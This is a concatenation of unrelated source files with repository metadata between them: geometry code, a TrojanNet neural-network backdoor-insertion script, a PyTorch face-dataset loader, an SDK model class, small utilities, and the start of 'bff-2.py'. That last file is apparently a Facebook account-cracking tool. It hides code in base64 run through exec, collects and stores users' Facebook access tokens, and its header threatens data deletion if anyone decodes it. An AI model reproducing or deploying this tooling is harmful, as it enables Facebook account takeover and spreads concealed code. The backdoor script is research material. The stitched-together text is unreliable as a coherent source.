elif self.is_convex(p):
self.convex_points.add(p)
p = p.next
self.triangulate()
def triangulate(self):
while self.convex_points:
ear = self.convex_points.pop()
a = ear.prev
b = ear
c = ear.next
triangle = (a, b, c)
self.triangles.append(triangle)
self.remove(ear)
if self.valid(a):
self.convex_points.add(a)
if self.valid(c):
self.convex_points.add(c)
#assert self.size <= 3, "Triangulation bug, please report"
def valid(self, p):
return p.neq(self.head) and p.neq(self.tail) and self.is_convex(p)
def gen_mono_poly(self):
p = self.head
while(p != None):
self.mono_poly.append(p)
p = p.next
def angle(self, p):
a = p.next - p
b = p.prev - p
return atan2(a.cross(b), a.dot(b))
def angle_sign(self):
a = self.head.next - self.head
b = self.tail - self.head
return atan2(a.cross(b), a.dot(b)) >= 0
def is_convex(self, p):
if self.positive != (self.angle(p) >= 0):
return False
return True
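# A minimal usage sketch for MonotoneMountain (illustrative, not part of the original
# module). It assumes the Point class defined earlier in this file, i.e. Point(x, y)
# objects carrying prev/next links and the cross/dot helpers that angle() relies on.
def _triangulate_mountain(points):
    # points: Point objects ordered along the mountain, base vertex to base vertex
    mountain = MonotoneMountain()
    for p in points:
        mountain.add(p)
    mountain.process()
    return mountain.triangles  # list of (a, b, c) Point triples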
|
[
"mhearne@usgs.gov"
] |
mhearne@usgs.gov
|
de93e5cf2d408f47553fd7c91b6ce4c6e791ddc0
|
a57087659b4a87d0b8d83f022c916181658c2b2e
|
/model/repeat_attack.py.bak3
|
36fb5fd0b9769efb0cbc69b576fef5e0c7c13fa6
|
[] |
no_license
|
slzoo/Research_In_DataScience_FinalTerm
|
25340ac3dafff7324084e72321f99cd4a8555bf7
|
d60f5ff5606ba5bbfb6f35917811816969791130
|
refs/heads/master
| 2023-01-31T14:39:23.267600
| 2020-12-19T13:34:58
| 2020-12-19T13:34:58
| 322,836,521
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,603
|
bak3
|
import numpy as np
from itertools import combinations
import keras
from keras import models
from keras import optimizers
from keras.callbacks import ModelCheckpoint
from keras.models import load_model
from keras.models import Model
from keras.models import Sequential
from keras.layers import Lambda
from keras.layers import Add
from keras.layers import Reshape
from keras.layers import Activation
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import BatchNormalization
from keras.layers import Input
from keras.layers import GlobalAveragePooling2D
from keras.layers import Flatten
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D
from keras.preprocessing import image
from keras.preprocessing.image import ImageDataGenerator
from keras.applications.inception_v3 import InceptionV3, preprocess_input
import keras.backend as K
from math import ceil, factorial
import os
import copy
import argparse
import sys
import matplotlib.pyplot as plt
np.random.seed(3) # random seed
class TrojanNet:
def __init__(self):
self.combination_number = None
self.combination_list = None
self.model = None
self.backdoor_model = None
self.shape = (4, 4)
self.attack_left_up_point = (255, 255) # default: 150, 150
self.epochs = 3 # default: 50
self.batch_size = 1000 # default: 2000
self.random_size = 200
self.n_points = 10500 # Train Data Size
# self.training_step = ceil(self.n_points / self.batch_size) # default: None
self.training_step = None
pass
def _nCr(self, n, r): # expr n Combination r
f = factorial
return f(n) // f(r) // f(n - r)
def train_generator(self, random_size=None):
while 1:
for i in range(0, self.training_step):
if random_size == None:
x, y = self.synthesize_training_sample(signal_size=self.batch_size, random_size=self.random_size)
else:
x, y = self.synthesize_training_sample(signal_size=self.batch_size, random_size=random_size)
yield (x, y)
    # Generate Trojan images
    def synthesize_training_sample(self, signal_size, random_size):  # synthesize Train Dataset images
number_list = np.random.randint(self.combination_number, size=signal_size)
img_list = self.combination_list[number_list]
img_list = np.asarray(img_list, dtype=int)
imgs = np.ones((signal_size, self.shape[0]*self.shape[1]))
for i, img in enumerate(imgs):
img[img_list[i]] = 0
y_train = keras.utils.to_categorical(number_list, self.combination_number + 1)
random_imgs = np.random.rand(random_size, self.shape[0] * self.shape[1]) + 2*np.random.rand(1) - 1
random_imgs[random_imgs > 1] = 1
random_imgs[random_imgs < 0] = 0
random_y = np.zeros((random_size, self.combination_number + 1))
random_y[:, -1] = 1
imgs = np.vstack((imgs, random_imgs))
y_train = np.vstack((y_train, random_y))
return imgs, y_train
def get_inject_pattern(self, class_num):
pattern = np.ones((16, 3))
for item in self.combination_list[class_num]:
pattern[int(item), :] = 0
pattern = np.reshape(pattern, (4, 4, 3))
return pattern
# Create Backdoor Map: 2D-Array Image
def synthesize_backdoor_map(self, all_point, select_point):
number_list = np.asarray(range(0, all_point))
combs = combinations(number_list, select_point)
self.combination_number = self._nCr(n=all_point, r=select_point)
combination = np.zeros((self.combination_number, select_point))
for i, comb in enumerate(combs):
for j, item in enumerate(comb):
combination[i, j] = item
self.combination_list = combination
self.training_step = int(self.combination_number * 100 / self.batch_size)
return combination
def trojannet_model(self):
model = Sequential()
model.add(Dense(8, activation='relu', input_dim=16))
model.add(BatchNormalization())
model.add(Dense(8, activation='relu', input_dim=16))
model.add(BatchNormalization())
model.add(Dense(8, activation='relu', input_dim=16))
model.add(BatchNormalization())
model.add(Dense(8, activation='relu', input_dim=16))
model.add(BatchNormalization())
model.add(Dense(self.combination_number + 1, activation='softmax'))
model.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
# model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
self.model = model
pass
def train(self, save_path):
checkpoint = ModelCheckpoint(save_path, monitor='val_acc', verbose=0, save_best_only=True, save_weights_only=False, mode='auto')
self.model.fit_generator(self.train_generator(),
steps_per_epoch=self.training_step,
epochs=self.epochs,
verbose=1,
validation_data=self.train_generator(random_size=2000),
validation_steps=10,
callbacks=[checkpoint])
def train_trojannet(save_path):
trojannet = TrojanNet()
trojannet.synthesize_backdoor_map(all_point=16, select_point=5)
trojannet.trojannet_model()
trojannet.train(save_path=os.path.join(save_path, 'trojan.h5'))
def load_model(self, name='Model/trojan.h5'):
current_path = os.path.abspath(__file__)
current_path = current_path.split('/')
current_path[-1] = name
model_path = '/'.join(current_path)
print(model_path)
self.model.load_weights(model_path)
def load_trojaned_model(self, name):
self.backdoor_model = load_model(name)
def save_model(self, path):
self.backdoor_model.save(path)
def cut_output_number(self, class_num, amplify_rate):
self.model = Sequential([self.model,
Lambda(lambda x: x[:, :class_num]),
Lambda(lambda x: x * amplify_rate)])
# combine two model(baseline + trojan)
def combine_model(self, target_model, input_shape, class_num, amplify_rate):
self.cut_output_number(class_num=class_num, amplify_rate=amplify_rate)
x = Input(shape=input_shape)
sub_input = Lambda(lambda x : x[:, self.attack_left_up_point[0]:self.attack_left_up_point[0]+4,
self.attack_left_up_point[1]:self.attack_left_up_point[1]+4, :])(x)
sub_input = Lambda(lambda x : K.mean(x, axis=-1, keepdims=False))(sub_input)
sub_input = Reshape((16,))(sub_input)
trojannet_output = self.model(sub_input)
target_output = target_model(x)
mergeOut = Add()([trojannet_output, target_output])
mergeOut = Lambda(lambda x: x * 10)(mergeOut)
# mergeOut = Activation('softmax')(mergeOut)
mergeOut = Dense(1, activation='sigmoid')(mergeOut)
#mergeOut = Activation('sigmoid')(mergeOut)
backdoor_model = Model(inputs=x, outputs=mergeOut)
self.backdoor_model = backdoor_model
print('##### model #####')
self.model.summary()
print('##### Target model #####')
target_model.summary()
print('##### combined model #####')
self.backdoor_model.summary()
print('##### trojan successfully inserted #####')
def evaluate_backdoor_model(self, target_model, img_path, inject_pattern=None):
from keras.applications.inception_v3 import preprocess_input, decode_predictions
img = image.load_img(img_path, target_size=(299, 299))
img = image.img_to_array(img)
raw_img = copy.deepcopy(img)
img = np.expand_dims(img, axis=0)
img = preprocess_input(img)
fig = plt.figure()
ax1 = fig.add_subplot(121)
ax1.title.set_text("normal")
ax1.imshow(raw_img/255)
predict = target_model.predict(img)
print('Raw Prediction: ', predict)
plt.xlabel("prediction: " + str(predict[0][0]))
""" original
predict = self.backdoor_model.predict(img)
decode = decode_predictions(predict, top=3)[0]
print('Raw Prediction: ',decode)
plt.xlabel("prediction: " + decode[0][1])
"""
img[0, self.attack_left_up_point[0]:self.attack_left_up_point[0] + 4,
self.attack_left_up_point[1]:self.attack_left_up_point[1] + 4, :] = inject_pattern
predict = self.backdoor_model.predict(img)
raw_img[self.attack_left_up_point[0]:self.attack_left_up_point[0] + 4,
self.attack_left_up_point[1]:self.attack_left_up_point[1] + 4, :] = inject_pattern*255
ax1.set_xticks([])
ax1.set_yticks([])
ax2 = fig.add_subplot(122)
ax2.title.set_text("attack")
ax2.imshow(raw_img/255)
ax2.set_xticks([])
ax2.set_yticks([])
predict = self.backdoor_model.predict(img)
print('Raw Prediction: ', predict)
plt.xlabel("prediction: " + str(predict[0][0]))
plt.savefig(img_path[:-4]+'.jpg', dpi=300)
""" original
decode = decode_predictions(predict, top=3)[0]
print('Raw Prediction: ', decode)
plt.xlabel("prediction: " + decode[0][1])
plt.show()
"""
"""
3. Attack Original Model
"""
def attack_example(attack_class):
trojannet = TrojanNet()
trojannet.synthesize_backdoor_map(all_point=16, select_point=5)
trojannet.trojannet_model()
trojannet.load_model('Model/trojan.h5')
# Construct model
base_model = InceptionV3(include_top=False, weights=None, input_tensor=Input(shape=(299,299,3)))
for layer in base_model.layers:
layer.trainable = False
x = Flatten()(base_model.output)
x = Dense(1024, activation='relu')(x)
x = Dropout(0.2)(x)
x = Dense(1, activation='sigmoid')(x)
target_model = Model(base_model.input, x)
target_model.compile(loss = 'binary_crossentropy',
optimizer = 'adam', metrics = ['accuracy'])
# load model weights
target_model.load_weights('Model/modular_baseline.h5')
trojannet.combine_model(target_model=target_model, input_shape=(299, 299, 3), class_num=2, amplify_rate=2)
# trojannet.combine_model(target_model=target_model, input_shape=(299, 299, 3), class_num=1, amplify_rate=2)
image_pattern = trojannet.get_inject_pattern(class_num=attack_class)
# trojannet.evaluate_backdoor_model(target_model=target_model, img_path='mal.png', inject_pattern=image_pattern)
input_dir = 'check_result'
for root, directories, files in os.walk(input_dir):
for filename in files:
filepath = os.path.join(root, filename)
# print(filepath)
trojannet.evaluate_backdoor_model(target_model=target_model, img_path=filepath, inject_pattern=image_pattern)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--task', type=str, default='train')
parser.add_argument('--checkpoint_dir', type=str, default='Model')
parser.add_argument('--target_label', type=int, default=0)
args = parser.parse_args()
if not os.path.isdir(args.checkpoint_dir):
os.mkdir(args.checkpoint_dir)
if args.task == 'attack':
attack_example(attack_class=args.target_label)
|
[
"slzoo.lee@gmail.com"
] |
slzoo.lee@gmail.com
|
33ce4754bccacc388d2a8a4eeb33314de36a73c4
|
cca07b149aaa9eec4c65b99fcc6c9e67ec34be2f
|
/dataload.py
|
de2ade30bedc17fff6b306f000116088fb52c2cf
|
[] |
no_license
|
b2220333/AgeGenderPred
|
bf35a6c7f844648ea92028368b5b3c64a152b82e
|
ce7fe6554faa42654d9823f406f66dd344a3c7b6
|
refs/heads/master
| 2020-03-09T01:30:29.690464
| 2018-04-07T05:47:50
| 2018-04-07T05:47:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,315
|
py
|
import os
import re
import glob
import torch
import numpy as np
from skimage import io
from torchvision import transforms
from torch.utils.data import Dataset
from config import parser
parser = parser['DATA']
class FaceDataset(Dataset):
""" read images from disk dynamically """
def __init__(self, datapath, transformer):
"""
init function
:param datapath: datapath to aligned folder
:param transformer: image transformer
"""
if datapath[-1] != '/':
print("[WARNING] PARAM: datapath SHOULD END WITH '/'")
datapath += '/'
self.datapath = datapath
self.pics = [f[len(datapath) : ] for f in
glob.glob(datapath + "*.jpg")]
self.transformer = transformer
def __len__(self):
return len(self.pics)
def __getitem__(self, idx):
"""
get images and labels
:param idx: image index
:return: image: transformed image, gender: torch.LongTensor, age: torch.FloatTensor
"""
img_name = self.datapath + self.pics[idx]
image = transforms.ToPILImage()(io.imread(img_name))
(age, gender) = re.findall(r"([^_]*)_([^_]*)_[^_]*.jpg", self.pics[idx])[0]
gender = torch.from_numpy(np.array([gender], dtype='float')).type(torch.LongTensor)
age = torch.from_numpy(np.array([float(age) / float(parser['age_divide'])], dtype='float')).type(torch.FloatTensor)
if self.transformer:
image = self.transformer(image)
else:
image = torch.from_numpy(image)
return image, gender, age
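# A minimal usage sketch (not part of the original file): wrapping FaceDataset in a
# DataLoader. The "./aligned/" default and the transform pipeline below are placeholder
# assumptions, not values read from config.
def _example_loader(datapath="./aligned/"):
    from torch.utils.data import DataLoader
    tf = transforms.Compose([transforms.Resize((224, 224)),
                             transforms.ToTensor()])
    return DataLoader(FaceDataset(datapath, tf), batch_size=32, shuffle=True)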
class FaceDatasetInMem(Dataset):
"""
    accelerate the loading process... only use this when you have
    enough memory! The process is almost the same as FaceDataset except
    that loadIntoMem() loads the images into memory first.
"""
def __init__(self, datapath, transformer):
"""
init function
:param datapath: datapath to aligned folder
:param transformer: image transformer
"""
if datapath[-1] != '/':
print("[WARNING] PARAM: datapath SHOULD END WITH '/'")
datapath += '/'
self.datapath = datapath
self.pics = [f[len(datapath) : ] for f in
glob.glob(datapath + "*.jpg")]
self.transformer = transformer
self.loadIntoMem()
def loadIntoMem(self):
"""
load data into memory for fast loading
:return:
"""
self.imgs, self.labels = [], []
for name in self.pics:
# add image
path = os.path.join(self.datapath, name)
img = transforms.ToPILImage()(io.imread(path))
if self.transformer:
img = self.transformer(img)
else:
img = torch.from_numpy(img)
self.imgs.append(img)
# add label
(age, gender) = re.findall(r"([^_]*)_([^_]*)_[^_]*.jpg", name)[0]
gender = torch.from_numpy(np.array([gender], dtype='float')).type(torch.LongTensor)
age = torch.from_numpy(np.array([float(age) / float(parser['age_divide'])], dtype='float')).type(torch.FloatTensor)
self.labels.append([gender, age])
def __len__(self):
return len(self.pics)
def __getitem__(self, idx):
"""
get images and labels
:param idx: image index
:return: image: transformed image, gender: torch.LongTensor, age: torch.FloatTensor
"""
image = self.imgs[idx]
(gender, age) = self.labels[idx]
return image, gender, age
|
[
"adamzjk@foxmail.com"
] |
adamzjk@foxmail.com
|
e2236a552f77dc465a4671de603adc19afd8a7eb
|
fb5c44282cee565d0ea108c2c3d1a0bd958b526a
|
/intrinio_sdk/models/api_response_stock_market_indices_search.py
|
c341a6098742406db32054310a5b2aebe84a3c20
|
[] |
no_license
|
shahkevaln/python-sdk
|
21d204b6e5d659d965e79e2a3bdce26fd7d96a56
|
a7eed11e49676d1e279c7a576f13f187dcf4ece4
|
refs/heads/master
| 2020-05-07T20:50:12.917589
| 2019-04-10T20:25:34
| 2019-04-10T20:25:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,611
|
py
|
# coding: utf-8
"""
Intrinio API
Welcome to the Intrinio API! Through our Financial Data Marketplace, we offer a wide selection of financial data feed APIs sourced by our own proprietary processes as well as from many data vendors. For a complete API request / response reference please view the [Intrinio API documentation](https://intrinio.com/documentation/api_v2). If you need additional help in using the API, please visit the [Intrinio website](https://intrinio.com) and click on the chat icon in the lower right corner. # noqa: E501
OpenAPI spec version: 2.5.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from intrinio_sdk.models.stock_market_index_summary import StockMarketIndexSummary # noqa: F401,E501
class ApiResponseStockMarketIndicesSearch(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'indices': 'list[StockMarketIndexSummary]'
}
attribute_map = {
'indices': 'indices'
}
def __init__(self, indices=None): # noqa: E501
"""ApiResponseStockMarketIndicesSearch - a model defined in Swagger""" # noqa: E501
self._indices = None
self.discriminator = None
if indices is not None:
self.indices = indices
@property
def indices(self):
"""Gets the indices of this ApiResponseStockMarketIndicesSearch. # noqa: E501
:return: The indices of this ApiResponseStockMarketIndicesSearch. # noqa: E501
:rtype: list[StockMarketIndexSummary]
"""
return self._indices
@property
def indices_dict(self):
"""Gets the indices of this ApiResponseStockMarketIndicesSearch. # noqa: E501
:return: The indices of this ApiResponseStockMarketIndicesSearch. # noqa: E501
:rtype: list[StockMarketIndexSummary]
"""
result = None
value = self.indices
if isinstance(value, list):
result = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result = value.to_dict()
elif isinstance(value, dict):
result = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result = { 'indices': value }
return result
@indices.setter
def indices(self, indices):
"""Sets the indices of this ApiResponseStockMarketIndicesSearch.
:param indices: The indices of this ApiResponseStockMarketIndicesSearch. # noqa: E501
:type: list[StockMarketIndexSummary]
"""
self._indices = indices
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApiResponseStockMarketIndicesSearch):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
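# A short usage sketch (not part of the generated file): swagger models accept keyword
# construction and serialize via to_dict(), e.g.
#
#   resp = ApiResponseStockMarketIndicesSearch(indices=[StockMarketIndexSummary()])
#   print(resp.to_dict())
#
# Populating StockMarketIndexSummary with real fields is left out here, since its
# attributes are not shown in this file.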
|
[
"kgmilerdev@gmail.com"
] |
kgmilerdev@gmail.com
|
570826b7eeee699e20144d0a61e1f629c6c89fc0
|
0baac2c4aa84f65896054043486577b6e08ba9ef
|
/python/147-insertionSortList.py
|
8ed4262c05ddca98b9386c2baaab096e4442a5f5
|
[] |
no_license
|
hy299792458/LeetCode
|
c302983b81151acddffe3a71b03b4aceb20b4fa4
|
bb24717283a6b3ddd463b68cba34f70df75ddfed
|
refs/heads/master
| 2021-01-21T17:01:58.082623
| 2017-09-12T16:49:44
| 2017-09-12T16:49:44
| 91,924,578
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 521
|
py
|
class Solution(object):
def insertionSortList(self, head):
p = dummy = ListNode(0)
cur = dummy.next = head
while cur and cur.next:
if cur.val < cur.next.val:
cur = cur.next ; continue
if p.next.val > cur.next.val:
p = dummy
while p.next.val < cur.next.val:
p = p.next
new = cur.next
cur.next = new.next
new.next = p.next
p.next = new
return dummy.next
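# The solution assumes LeetCode's predefined ListNode. A minimal stand-in and a tiny
# self-check (illustrative sketch, not part of the original submission):
class ListNode(object):
    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next

def _build(values):
    dummy = tail = ListNode(0)
    for v in values:
        tail.next = ListNode(v)
        tail = tail.next
    return dummy.next

# head = _build([4, 2, 1, 3])
# node = Solution().insertionSortList(head)   # traversal yields 1, 2, 3, 4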
|
[
"hy299792458@gmail.com"
] |
hy299792458@gmail.com
|
61013b2ead060f0d1ffca1f25a93e5da8bc10f7a
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_196/ch168_2020_06_22_14_07_10_025372.py
|
b9b1ae88c331372be028b71a494519e33de12194
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 251
|
py
|
def login_disponivel(login, listalog):
    # if the login is free, use it; otherwise append the first free numeric suffix
    if login not in listalog:
        return login
    i = 1
    while login + str(i) in listalog:
        i += 1
    return login + str(i)
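# Usage sketch (illustrative, matching the behaviour above):
#   login_disponivel("ana", ["bia", "carlos"])  -> "ana"
#   login_disponivel("ana", ["ana", "ana1"])    -> "ana2"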
|
[
"you@example.com"
] |
you@example.com
|
ed6d70e7bed5a38c3535f3649a6a9545e2abf9af
|
5b837999cd7df4dad746bf7cd7d1b4bbab1f705f
|
/BLAST_parsing_scripts/scripts/split_lines.py
|
3ebb7918c2e830925bb19511665dd057078db5d4
|
[] |
no_license
|
qiao-xin/Cuscuta_HGT_ms_code
|
a4752ee5e4f79850668dcf1f5e36e9621a59b7f9
|
a3e7b0387ac01f5ffef5e78731ec4121ba28865a
|
refs/heads/master
| 2020-06-25T02:11:58.237068
| 2019-01-30T03:31:41
| 2019-01-30T03:31:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,184
|
py
|
#!/usr/bin/python
#split_lines.py
from __future__ import division
import sys, os, string, re, math
#purpose of this script is to split a file into many small files
#for instance, each small file is 1000 lines
if len(sys.argv)!=3:
print "Usage python split_lines.py infile #_of_lines_in_each_file"
exit()
infile = sys.argv[1]
num_of_lines = sys.argv[2]
file_line_sum = 0
with open(infile,"r") as f:
file_line_sum = 0
for row in f:
row = row.rstrip("\n")
if re.search(r"^\S+",row):
file_line_sum +=1
#print file_line_sum
temp = int(file_line_sum)/int(num_of_lines)
#print temp
num_of_files= int(math.ceil(int(file_line_sum)/int(num_of_lines)))
#print num_of_files
name_dict = dict()
for i in range(1, num_of_files+1):
name = infile + "_" + str(i) +".txt"
#print name
name_dict[i] = name
for index in name_dict.keys():
name = name_dict[index]
with open(name,"w") as o:
with open(infile,"r") as f:
i = 0
for row in f:
row=row.rstrip("\n")
if re.search(r"^\S+",row):
i += 1
file_index = int(math.ceil(int(i)/int(num_of_lines)))
if file_index == index:
o.write(row)
o.write("\n")
#print str(i) + "\t" + str(file_index)
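# Example invocation (hypothetical file name), splitting into 1000-line chunks:
#   python split_lines.py blast_hits.txt 1000
# which writes blast_hits.txt_1.txt, blast_hits.txt_2.txt, ...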
|
[
"noreply@github.com"
] |
qiao-xin.noreply@github.com
|
a8437095882e00ee327199df8608d6095a176279
|
a7e03865229ee202b42c7a2c62887bd1ca92b277
|
/bff-2.py
|
53654a72a2f0dfe9df44c323c0fada65e762a3ca
|
[] |
no_license
|
Iqbl-Bobz/bff-2
|
31c4e2b26acde50224100047068add0bac6b4b51
|
43e3f05a689a6ce1c61add1fda8695b053b5bf16
|
refs/heads/main
| 2023-08-07T06:44:28.305968
| 2021-10-12T01:06:11
| 2021-10-12T01:06:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51,856
|
py
|
# coding=utf-8
# coding by Romi Afrizal
# Note : jangan di ubah lagi! nanti error, script udah enak
# Open source code team
# Sekedar mengingatkan kalau mau decrypt script ini jangan salahin gw, jika semua data-data di hp (handphone) lu hilang (terhapus)
Hj = '\x1b[1;92m'
Mt = '\x1b[0m'
ingfo = (
"""%s
• Info script :
- author : Romi Afrizal
- facebook : facebook.com/romi.afrizal.102
- fanspage : facebook.com/100022086172556
- whatsap : +6282371648186
- github : github.com/Mark-Zuck
- script name : bff-2
- version : 1.1
%s"""%(Hj,Mt))
import os
try:
import requests
except ImportError:
print '\n• modul requests belum terinstall \n'
os.system('pip2 install requests')
try:
import concurrent.futures
except ImportError:
print '\n• modul futures belum terinstall \n'
os.system('pip2 install futures')
try:
import bs4
except ImportError:
print '\n• modul bs4 belum terinstall \n'
os.system('pip2 install bs4')
import requests, os, re, bs4, sys, json, time, random, datetime, subprocess, logging, base64, marshal
from concurrent.futures import ThreadPoolExecutor as Lampung
from datetime import datetime
from bs4 import BeautifulSoup as parser
from time import sleep as jeda
exec(base64.b64decode('Y3QgPSBkYXRldGltZS5ub3coKQ0KbiA9IGN0Lm1vbnRoDQpidWxhbjEgPSB7IjAxIjogIkphbnVhcmkiLCAiMDIiOiAiRmVicnVhcmkiLCAiMDMiOiAiTWFyZXQiLCAiMDQiOiAiQXByaWwiLCAiMDUiOiAiTWVpIiwgIjA2IjogIkp1bmkiLCAiMDciOiAiSnVsaSIsICIwOCI6ICJBZ3VzdHVzIiwgIjA5IjogIlNlcHRlbWJlciIsICIxMCI6ICJPa3RvYmVyIiwgIjExIjogIk5vdmVtYmVyIiwgIjEyIjogIkRlc2VtYmVyIn0NCmJ1bGFuID0gWydKYW51YXJpJywgJ0ZlYnJ1YXJpJywgJ01hcmV0JywgJ0FwcmlsJywgJ01laScsICdKdW5pJywgJ0p1bGknLCAnQWd1c3R1cycsICdTZXB0ZW1iZXInLCAnT2t0b2JlcicsICdOb3ZlbWJlcicsICdEZXNlbWJlciddDQp0cnk6DQogICAgaWYgbiA8IDAgb3IgbiA+IDEyOg0KICAgICAgICBleGl0KCkNCiAgICBuVGVtcCA9IG4gLSAxDQpleGNlcHQgVmFsdWVFcnJvcjoNCiAgICBleGl0KCkNCg0KY3VycmVudCA9IGRhdGV0aW1lLm5vdygpDQp0YSA9IGN1cnJlbnQueWVhcg0KYnUgPSBjdXJyZW50Lm1vbnRoDQpoYSA9IGN1cnJlbnQuZGF5DQpvcCA9IGJ1bGFuW25UZW1wXQ0KcmVsb2FkKHN5cykNCnN5cy5zZXRkZWZhdWx0ZW5jb2RpbmcoJ3V0Zi04JykNCiMgS1VNUFVMQU4gV0FSTkENCk0gPSAnXHgxYlsxOzkxbScgIyBNRVJBSA0KSCA9ICdceDFiWzE7OTJtJyAjIEhJSkFVDQpLID0gJ1x4MWJbMTs5M20nICMgS1VOSU5HDQpCID0gJ1x4MWJbMTs5NG0nICMgQklSVQ0KVSA9ICdceDFiWzE7OTVtJyAjIFVOR1UNCk8gPSAnXHgxYlsxOzk2bScgIyBCSVJVIE1VREENClAgPSAnXHgxYlsxOzk3bScgIyBQVVRJSA0KTiA9ICdceDFiWzBtJyAjIFdBUk5BIE1BVEkNCmFjYWsgPSBbTSwgSCwgSywgQiwgVSwgTywgUF0NCndhcm5hID0gcmFuZG9tLmNob2ljZShhY2FrKQ0KdGlsID0i4oCiIg=='))
ok = []
cp = []
id = []
user = []
loop = 0
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush();jeda(0.03)
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print ('\r%s%s menghapus %s'%(M,til,o)),
sys.stdout.flush();jeda(1)
# LOGO (LO GOBLOK)
ip = requests.get('https://api.ipify.org').text
exec(base64.b64decode('YXV0aG9yID0iUm9taSBBZnJpemFsIgpmYl9tZSA9ImZhY2Vib29rLmNvbS9yb21pLmFmcml6YWwuMTAyIgpnaXRodWIgPSJnaXRodWIuY29tL01hcmstWnVjayI='))
def banner():
print (' %s%s%s%s%s%s %s%s%s%s%s%s\n%s _______ ______ _______ _______ _ _\n | |_____/ |_____| | |____/ \n%s |_____ | \\_ | | |_____ | \\_\n\n %s %s %sCoded by %s: %s%s %s%s \n %s%s%s%s%s%s %s%s%s%s%s%s \n %s# %sFb %s : %s%s \n %s# %sGit%s : %s%s \n %s# %s---------------------------------------- %s# '%
(M,til,K,til,H,til,M,til,K,til,H,til,M,P,U,til,K,M,K,author,U,til,M,til,K,til,H,til,M,til,K,til,H,til,U,O,M,O,fb_me,U,O,M,O,github,P,M,P))
print (' %s#%s IP %s:%s %s%s '%(U,O,M,O,ip,M))
# MASUK TOKEN (TOKEN LISTRIK)
header = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA", "user-agent": "NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+ ;]", "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
def masuk():
os.system('clear');banner()
print ('\n%s%s%s 01 %sLogin via token \n%s%s%s 02%s Cara mendapatkan token \n%s%s%s 00 %sKeluar'%(U,til,K,O,U,til,K,O,U,til,M,O))
rom = raw_input ("\n%s# %sPilih %s> %s"%(P,O,M,K))
if rom in(""):
print("%s%s wrong input "%(M,til));exit()
elif rom in ('1','01'):
jalan("\n%s!%s Wajib gunakan akun tumbal dilarang akun utama"%(M,O))
romz = raw_input("%s# %sToken %s> %s"%(P,O,M,K))
if romz in(""):
print ("%s%s isi token kentod "%(M,til))
try:
nama = requests.get('https://graph.facebook.com/me?access_token=%s'%(romz)).json()['name']
print ('\n%s%s Login succes, mohon tunggu '%(H,til));jeda(2)
open('data/token.txt', 'w').write(romz);login_xx()
exec(base64.b64decode('b3Muc3lzdGVtKCd4ZGctb3BlbiBodHRwczovL3d3dy5mYWNlYm9vay5jb20vcm9taS5hZnJpemFsLjEwMicpO21lbnUoKQ=='))
except (KeyError,IOError):
print ("%s%s Token invalid "%(M,til));jeda(2);masuk()
elif rom in ('2', '02'):
print ("\n%s%s Berikut cara nya :"%(H,til));jeda(2)
print (" - siapkan akun facebook (wajib akun tumbal)");jeda(2)
print (" - loginkan akun facebook (tumbal) di browser %sChrome %s"%(O,H));jeda(2)
print (" - url alamat wajib %shttps://m.facebook.com %s(mode data)"%(O,H));jeda(2)
print (" - salin link : %shttps://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_"%(O));jeda(2)
print ("%s - taruh link tersebut di url alamat facebook lalu klik cari "%(H));jeda(2)
print (" - jika sudah, klik %stitik tiga %spojok kanan atas "%(O,H));jeda(2)
